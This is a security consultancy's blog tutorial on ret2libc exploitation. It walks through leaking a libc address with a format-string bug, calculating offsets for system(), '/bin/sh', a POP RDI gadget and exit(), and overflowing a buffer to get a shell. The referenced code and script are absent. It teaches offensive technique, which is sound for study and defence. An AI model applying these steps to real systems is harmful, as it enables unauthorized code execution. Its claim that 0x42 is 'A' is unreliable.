Return to Libc: Linux Exploit Development
This blog post will cover how to conduct a ret2libc attack. The ret2libc technique is a tactic used in Linux exploit development that allows attackers to call functions associated with libc (the standard C library). If the attacker can overwrite a return address in a vulnerable process, then the attacker may be able to use this technique to execute system(“/bin/sh”) and obtain a working shell. This technique may be used to bypass Data Execution Prevention (DEP), which is an exploit mitigation technology that prevents attackers from running code on non-executable sections of memory.
This technique requires that the attacker knows the virtual address of where libc was loaded at runtime. If Address Space Layout Randomization (ASLR) is enabled (which it will be for this tutorial), then the attacker must calculate this base address from a pointer previously obtained via a different memory leaking vulnerability such as a format string vulnerability. Once the attacker knows the base address, the attacker can add unchanging offsets to that address in order to calculate the addresses of other important functions/variables, such as the system() function or the “/bin/sh” string.
Overwriting the Return Address
Below is a code snippet for a vulnerable program.
When this program is executed, it simply repeats anything that is typed in as input until the user tells the program to quit.
Note that there is a vulnerable call to fgets() in the program, which allows an attacker to copy up to 1000 bytes of data into the 100-byte-long buffer buf. The attacker can use this buffer overflow vulnerability to overwrite the return address after 120 bytes have been inputted into the program (assuming that the first four characters are “quit”). In the example shown below, the return address has been overwritten with an attacker-controlled value of 0x4242424242424242 (being 0x42 the hex equivalent for “A” in ASCII).
One interesting thing to note about ASLR is that while it does modify the locations of certain variables and functions, it usually does not modify the offsets of these variables and functions. For example, suppose that, while debugging a running process, we hit a breakpoint and notice that there is some stack variable x at location 0x7ffffffff000 and another stack variable y at location 0x7ffffffff100. Assuming ASLR is enabled, if we were to rerun the process a second time and see that x is now stored at location 0x7ffffffff510 when we hit the same breakpoint, then we would expect that y would be located at 0x7ffffffff610. In other words, even though the addresses of each variable get modified, x and y continue to have an offset of exactly 0x100 bytes away from each other in each instance of the program.
This happens because it would take far too long for ASLR to randomize the locations of every variable in a program. Instead, ASLR simply randomizes the base addresses of the memory mappings, which causes the distances between two variables in the same memory mapping to rarely change.
Of course, there are exceptions to this rule of rarely changing offsets. If x was a heap variable while y was a stack variable, then there would be a far greater chance for the offsets to change since the heap and the stack are loaded into two very separate memory mappings. Furthermore, if we were to use two different breakpoints at two different locations of the program, then there would be a greater chance for one of the variables to have been deleted or moved somewhere else due to the constantly changing nature of the stack. However, for the purposes of conducting a ret2libc attack, this is a perfect scenario because if we know the address where the libc library is loaded, then we know we can add the value of an unchanging offset to that address to obtain the address of a function within the libc library.
There are four main steps to completing a basic return-to-libc attack:
Obtain an address that points to something within the libc library using something like a format string vulnerability (only required if ASLR is enabled).
Use the address from step 1 to calculate the base address of the libc library.
Calculate the addresses of the libc functions you would like to jump to by using the base address of the libc library.
Use a different vulnerability, such as a buffer overflow, to overwrite the return address with the libc function that you would like to jump to (you can also use ROP chains to jump to multiple libc functions).
Finding Libc Base Address
Our first step is to use a format string vulnerability to leak an address from the stack that points to a function/variable in the libc library. In order to see the entire memory mapping from a specific running instance of the program, we can run the program in GDB using the r command, hit Ctrl-C while the program is running, and make use of the vmmap command. Note that these addresses can change if you rerun the program.
In this instance of the program, the base of libc is at 0x7ffff7def000, and the end of libc is at 0x7ffff7fb0000 (both addresses are highlighted). If we exploit the format string vulnerability, we can see that the fifth pointer printed out from the stack (also highlighted) points to an address that is within the libc library, so this will be the address that we are going to use.
If we subtract the base of libc from the fifth pointer, we get 0x7ffff7fadbe0 - 0x7ffff7def000 = 0x1bebe0. In other words, if we subtract an offset of 0x1bebe0 from the value of the fifth pointer, then we can obtain the address of the base of libc. We can use this information to start creating an exploit script with pwntools.
Finding Other Addresses
Our next step is to obtain the address of system(), which is located in the libc library. In most Linux systems, libc is stored in a file called /usr/lib/x86_64-linux-gnu/libc-2.31.so, so we can use the following command to obtain the offset of system() from the base of libc.
The offset is 0x48df0, meaning that if we add 0x48df0 to the libc_base variable we created in the Python script earlier, we should get the address of system().
Since our goal is to call system("/bin/sh"), we'll also need to have a pointer to the string “/bin/sh”. Because libc uses this string in its code, this string is also located within the libc library, and we can use GDB to look for it.
Note that the parameters for the above find command are the beginning and end of the libc memory mapping for that instance. The command gave us an address of 0x7ffff7f79156, which has an offset of 0x7ffff7f79156 - 0x7ffff7def000 = 0x18a156.
We'll also need to have access to a POP RDI ROP gadget, which will allow us to store a pointer to the “/bin/sh” string into RDI. We can use the command shown below to obtain a POP RDI gadget.
The gadget at offset 0x26796 seems suitable for our purposes.
The last offset we need to obtain is the address of the exit() function, which will allow us to cleanly exit the program once we're done using our shell. We can find this address the same way we found the address of system().
We'll be using the first offset, 0x3e600, and we'll ignore the other functions.
Putting It All Together
Using the information we gathered in the previous section, we can generate the following exploit script:
First, we use the format string vulnerability to leak an address that allows us to calculate the base of libc. Next, we add various offsets to this base value in order to obtain the addresses we need to use in our exploit. Once that is done, we generate a ROP chain that does the following:
Uses the string “quit” to ensure that the program breaks out of the loop and hits a RET instruction at some point.
Sends 116 bytes of A's to the process in order to get to the return address.
Overwrites the return address with the address of the POP RDI gadget.
Sets the value of RDI to the address of “/bin/sh”.
Overwrites the return address again with the address of system().
Overwrites the return address one last time with the address of exit().
When we run this script, we successfully conduct a ret2libc attack against the binary and get a working shell!
Polito, Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.